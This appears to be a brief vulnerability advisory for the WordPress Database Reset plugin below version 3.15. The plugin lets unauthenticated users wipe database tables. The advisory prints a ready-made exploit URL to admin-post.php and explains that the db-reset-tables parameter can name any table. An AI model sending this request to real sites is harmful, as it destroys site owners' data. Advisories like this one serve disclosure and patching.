This flaw “allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state.”
URL/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code;=11111&db-reset-code-confirm;=11111 Where you can set db-reset-tables%5B%5D to any database table you want to delete.
CPE | Name | Operator | Version |
---|---|---|---|
wordpress-database-reset | lt | 3.15 |